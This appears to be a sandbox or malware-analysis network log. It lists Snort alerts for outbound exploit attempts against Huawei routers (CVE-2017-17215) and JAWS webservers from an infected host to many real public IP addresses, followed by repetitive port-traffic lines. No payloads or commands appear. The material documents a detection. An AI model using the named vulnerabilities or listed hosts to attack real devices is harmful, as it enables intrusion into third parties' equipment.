      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48512 -> 156.225.146.41:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36146 -> 156.254.51.110:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34470 -> 104.17.87.76:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50566 -> 213.166.224.66:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52160 -> 159.65.187.17:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41284 -> 23.32.144.181:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44962 -> 186.6.8.24:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55334 -> 156.229.184.168:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40940 -> 144.96.231.29:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49840 -> 71.19.150.109:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48994 -> 147.46.197.78:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38290 -> 45.139.16.76:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60546 -> 217.21.47.89:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37476 -> 185.182.76.162:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34920 -> 170.130.4.88:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55512 -> 31.24.151.253:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40154 -> 93.57.23.118:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41002 -> 108.76.155.143:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42008 -> 122.11.174.31:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33112 -> 110.9.137.130:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55254 -> 23.7.34.44:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38818 -> 18.67.56.65:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49594 -> 156.244.112.119:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59096 -> 80.96.102.56:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35400 -> 80.64.65.82:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33510 -> 173.39.254.96:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44420 -> 203.178.142.140:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59568 -> 64.77.109.214:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43874 -> 178.114.177.201:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56796 -> 31.133.86.49:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47410 -> 45.195.121.85:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54662 -> 54.70.46.147:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38908 -> 122.49.70.5:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56214 -> 183.105.112.84:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48398 -> 103.193.186.56:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52034 -> 156.241.109.127:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36720 -> 156.247.18.133:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:42572 -> 156.244.118.221:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43180 -> 156.226.86.116:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57322 -> 156.226.66.174:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47094 -> 92.122.46.138:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43232 -> 193.26.18.8:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47018 -> 81.140.234.75:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39268 -> 181.48.125.228:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52818 -> 104.207.133.193:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52874 -> 52.86.208.1:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44100 -> 156.226.196.201:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43486 -> 104.164.90.104:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60828 -> 63.41.132.164:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51658 -> 52.201.36.146:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53392 -> 156.226.13.73:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45786 -> 156.224.30.13:37215
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50614 -> 156.247.23.249:37215
      Source: global trafficTCP traffic: 197.253.100.90 ports 1,2,3,5,7,37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44798 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45704 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45704 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45704 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55242 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45704 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51016 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53284 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 53284
      Source: unknownNetwork traffic detected: HTTP traffic on port 55870 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45514 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52374
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52380
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52384
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52386
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52628
      Source: unknownNetwork traffic detected: HTTP traffic on port 32968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52634
      Source: unknownNetwork traffic detected: HTTP traffic on port 55178 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34648 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52636
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52650
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52662
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52674
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52688
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52692
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52696
      Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52698
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52708
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52710
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52712
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52714
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52736
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52746
      Source: unknownNetwork traffic detected: HTTP traffic on port 36014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40758 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52766
      Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34138 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52786
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52794
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52796
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52800
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52802
      Source: unknownNetwork traffic detected: HTTP traffic on port 34648 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55178 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52804
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52808
      Source: unknownNetwork traffic detected: HTTP traffic on port 34138 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52834
      Source: unknownNetwork traffic detected: HTTP traffic on port 35426 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 52846
      Source: unknownNetwork traffic detected: HTTP traffic on port 57506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45704 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34138 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45718 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60262 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34138 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34648 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55178 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60262 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42282 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60224 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42282 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34138 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60224 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60262 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32892 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60224 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32892 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42054 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32892 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60224 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34648 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55178 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42282 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32892 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41668 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54366 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60482 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60224 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 47132 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60482 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54366 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41668 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36062 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32892 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60482 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60262 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44134 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34138 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36062 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60482 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35910 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52076 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41668 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54366 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 42282 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35910 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48104 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40618 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38034 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48104 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40618 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35910 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48104 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40618 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36062 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60224 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48722 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60060 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44256 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35910 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48104 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50584 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60060 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 45370 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40618 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60482 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60060 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32968 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 32892 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59512 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 33208 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43604 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 47706 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35624 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53046 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60060 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48722 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48104 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43604 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35624 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53046 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54042 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35910 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43604 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 40618 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35624 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53046 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 41668 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54366 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 55178 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 34648 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60060 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60448 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35624 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43604 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53046 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48722 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36014 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59084 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59908 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52214 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59084 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 36062 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52214 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59908 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 44580 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 57506 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 60448 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59084 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 38752 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 52214 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59908 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 48104 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53460 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 53460 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 35624 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 59084 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 54378 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 43604 -> 37215
      Source: unknownNetwork traffic detected: HTTP traffic on port 56984 -> 37215
